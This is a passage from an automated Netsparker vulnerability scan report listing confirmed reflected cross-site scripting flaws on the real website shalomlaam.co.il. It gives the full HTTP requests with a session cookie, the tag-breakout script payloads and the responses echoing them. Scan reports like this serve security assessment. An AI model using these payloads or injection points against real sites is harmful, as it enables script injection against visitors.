Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:04 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 184
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/l/agrala_miadim.asp'"--></style></script><script>netsparker(0x00038E)</script><BR>script><BR>style><<script>netsparker(0x00038E)<.asp?id=script>
3.121. /site/pitgam/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000293)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000293..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000293)</script>
Request
GET /site/pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000293)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 20 May 2014 13:56:09 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Encoding:
Vary: Accept-Encoding
Transfer-Encoding: chunked
404;http://www.shalomlaam.co.il:80/site/pitgam/'"--></style></script><script>netsparker(0x000293)</script><BR>script><BR>style><<script>netsparker(0x000293)<.asp?id=script>
78 / 146
3.122. /ask/ CONFIRMED
http://www.shalomlaam.co.il/ask/?cat='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005FC)%3..
Parameters
Parameter Type Value
cat GET '"--></style></script>
<script>alert(0x0005FC)</script>
page GET 3
rabbi GET 3
tbl GET 3
Request
GET /ask/?cat='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005FC)%3C/script%3E&page=3&rabbi=3&tbl=3 HTTP/1.1
Referer: http://www.shalomlaam.co.il/ask/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

?CatID=0&page=4'></a>
</td>
<td valign="top" width="50">
<form name=form method=get target="_top">
<INPUT TYPE='hidden' NAME='tbl' value=''>
<INPUT TYPE='hidden' NAME='cat' value=''"--></style></script><script>netsparker(0x0005FC)</script>'>
<INPUT TYPE='hidden' NAME='rabbi' value='3'>
<select name='page' dir=rtl onChange='form.submit()'>
<script LANGUAGE="JavaScript">
for(var i=1;i<=23;i++){
if (i!=3){
document.w

3.123. /site/gallery/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F7)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0000F7)</script>
Request
GET /site/gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000F7)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:05 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 173
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/gallery/'"--></style></script><script>netsparker(0x0000F7)</script><BR>script><BR>style><<script>netsparker(0x0000F7)<.asp?id=script>
79 / 146
3.124. /ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000149)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000149)%3C/scr..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000149)</script>
Request
GET /ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000149)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:45 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 164
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/ask/'"--></style></script><script>netsparker(0x000149)</script><BR>script><BR>style><<script>netsparker(0x000149)<.asp?id=script>
3.125. /ask/reg/ CONFIRMED
http://www.shalomlaam.co.il/ask/reg/?'"--></style></script><script>alert(0x00062B)</script>
Parameters
Parameter Type Value
Query Based Query String '"--></style></script>
<script>alert(0x00062B)</script>
Request
GET /ask/reg/?'"--></style></script><script>netsparker(0x00062B)</script> HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:07:42 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 169
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/ask/reg/?'"--></style></script><script>netsparker(0x00062B)</script><BR>script><BR>style><<script>netsparker(0x00062B)<.asp?id=script>
3.126. /gvideo/style/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00044E)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gvideo/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00044..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00044E)</script>
80 / 146
Request
GET /gvideo/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00044E)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:01:42 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 173
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gvideo/style/'"--></style></script><script>netsparker(0x00044E)</script><BR>script><BR>style><<script>netsparker(0x00044E)<.asp?id=script>
3.127. /tags/ CONFIRMED
http://www.shalomlaam.co.il/tags/?q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BC)%3C..
Parameters
Parameter Type Value
q GET '"--></style></script>
<script>alert(0x0001BC)</script>
Request
GET /tags/?q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001BC)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

co.il/favicon.ico" type="image/vnd.microsoft.icon">
<meta property="app_id" content="d87442e00d37a7959d0d216f101e0ea0">
<meta property="admins" content="1162579212">
<title> - - '"--></style></script><script>netsparker(0x0001BC)</script></title>
<meta name="Author" CONTENT="shalomlaam.co.il">
<meta name="Keywords" content=',,,,,,,,,,,,,,,,,,

n="top">
<table width="800" border="0" cellspacing="0" cellpadding="0">
<tr dir="rtl">
<td valign="top"><h1><span class="text_h1"><span class="koteret" dir="rtl"> ''''--></style></script><script>netsparker(0x0001BC)</script></span></span></h1>
<table width="560" border="0" align="left" cellpadding="0" cellspacing="0">
<tr><td><span style="font-weight:Normal; font-size:15px;"> 0 ''''--></style></script><script>netsparker(0x0001BC)</script></span></td></tr><tr><td height=25></td></tr>
<tr><td height="15"></td></tr>
<tr><td align="center"><a href="/tags/tags.asp" style="font-size:18px;"> </a></td></tr>

3.128. /contact/reg/ CONFIRMED


http://www.shalomlaam.co.il/contact/reg/?'"--></style></script><script>alert(0x000471)</script>
Parameters
Parameter Type Value
Query Based Query String '"--></style></script>
<script>alert(0x000471)</script>
Request
GET /contact/reg/?'"--></style></script><script>netsparker(0x000471)</script> HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
81 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:02:59 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 173
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/reg/?'"--></style></script><script>netsparker(0x000471)</script><BR>script><BR>style><<script>netsparker(0x000471)<.asp?id=script>
3.129. /js/delate_image.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003CE)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/js/delate_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..
Parameters
Parameter Type Value
field GET picture_
URI-BASED Full URL '"--></style></script>
<script>alert(0x0003CE)</script>
Request
GET /js/delate_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003CE)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/js/func_site.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:28 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 179
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/delate_image.asp'"--></style></script><script>netsparker(0x0003CE)</script><BR>script><BR>style><<script>netsparker(0x0003CE)<.asp?id=script>
3.130. /ask'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00017C)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/ask'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00017C)%3C/scri..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00017C)</script>
Request
GET /ask'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00017C)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:46:33 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 163
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/ask'"--></style></script><script>netsparker(0x00017C)</script><BR>script><BR>style><<script>netsparker(0x00017C)<.asp?id=script>
82 / 146
3.131. /ask/ask_rabbi.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000584)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000584)</script>
Request
GET /ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000584)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/ask/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:04:48 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 177
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/ask/ask_rabbi.asp'"--></style></script><script>netsparker(0x000584)</script><BR>script><BR>style><<script>netsparker(0x000584)<.asp?id=script>
3.132. /site/etz_haim/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AE)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0002AE)</script>
Request
GET /site/etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002AE)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:56:29 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 174
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/etz_haim/'"--></style></script><script>netsparker(0x0002AE)</script><BR>script><BR>style><<script>netsparker(0x0002AE)<.asp?id=script>
83 / 146
3.133. /gvideo/js/swfaddress.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000445)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gvideo/js/swfaddress.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000445)</script>
Request
GET /gvideo/js/swfaddress.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000445)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/gvideo/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:01:39 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 183
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gvideo/js/swfaddress.js'"--></style></script><script>netsparker(0x000445)</script><BR>script><BR>style><<script>netsparker(0x000445)<.asp?id=script>
3.134. /site/bmidrash/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AD)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0002AD)</script>
Request
GET /site/bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002AD)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:56:28 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 174
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/bmidrash/'"--></style></script><script>netsparker(0x0002AD)</script><BR>script><BR>style><<script>netsparker(0x0002AD)<.asp?id=script>
84 / 146
3.135. /ask/ CONFIRMED
http://www.shalomlaam.co.il/ask/
Parameters
Parameter Type Value
action POST search
search POST '"--></style></script>
<script>alert(0x0005D6)</script>
subject POST 0
Request
POST /ask/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/ask/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 90
Accept-Encoding: gzip, deflate
action=search&search='"--></style></script><script>netsparker(0x0005D6)</script>&subject=0
Response

<input name="search" type="text" id="search" onFocus="if(this.value==' ') this.value='';" onBlur="if(this.value=='') this.value=' ';" value="'"--></style></script>
<script>netsparker(0x0005D6)</script>" />
</td>
<td bgcolor="#FEF4D3">&nbsp;</td>
<td width="131" bgcolor="#FEF4D3"><select name="subject" dir="rtl" class

3.136. /contact/search/ CONFIRMED


http://www.shalomlaam.co.il/contact/search/?'"--></style></script><script>alert(0x0004AC)</script>
Parameters
Parameter Type Value
Query Based Query String '"--></style></script>
<script>alert(0x0004AC)</script>
Request
GET /contact/search/?'"--></style></script><script>netsparker(0x0004AC)</script> HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:23 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 176
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/search/?'"--></style></script><script>netsparker(0x0004AC)</script><BR>script><BR>style><<script>netsparker(0x0004AC)<.asp?id=script>
3.137. /js/top1.htm CONFIRMED
http://www.shalomlaam.co.il/js/top1.htm?'"--></style></script><script>alert(0x0003C9)</script>
Parameters
Parameter Type Value
Query Based Query String '"--></style></script>
<script>alert(0x0003C9)</script>
85 / 146
Request
GET /js/top1.htm?'"--></style></script><script>netsparker(0x0003C9)</script> HTTP/1.1
Referer: http://www.shalomlaam.co.il/js/func_site.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:27 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 172
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/top1.htm?'"--></style></script><script>netsparker(0x0003C9)</script><BR>script><BR>style><<script>netsparker(0x0003C9)<.asp?id=script>
3.138. /Branches/snif.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000204)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/Branches/snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..
Parameters
Parameter Type Value
id GET 61
URI-BASED Full URL '"--></style></script>
<script>alert(0x000204)</script>
Request
GET /Branches/snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000204)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:26 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 177
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/Branches/snif.asp'"--></style></script><script>netsparker(0x000204)</script><BR>script><BR>style><<script>netsparker(0x000204)<.asp?id=script>
3.139. /site/bmidrash/mekorot.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000386)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/bmidrash/mekorot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..
Parameters
Parameter Type Value
id GET 1087
URI-BASED Full URL '"--></style></script>
<script>alert(0x000386)</script>
Request
GET /site/bmidrash/mekorot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000386)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
86 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:59:58 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 185
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/bmidrash/mekorot.asp'"--></style></script><script>netsparker(0x000386)</script><BR>script><BR>style><<script>netsparker(0x000386)<.asp?id=script>
3.140. /site/gallery/highslide/highslide-full.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C4)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/gallery/highslide/highslide-full.js'%22--%3E%3C/style%3E%3C/script%..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
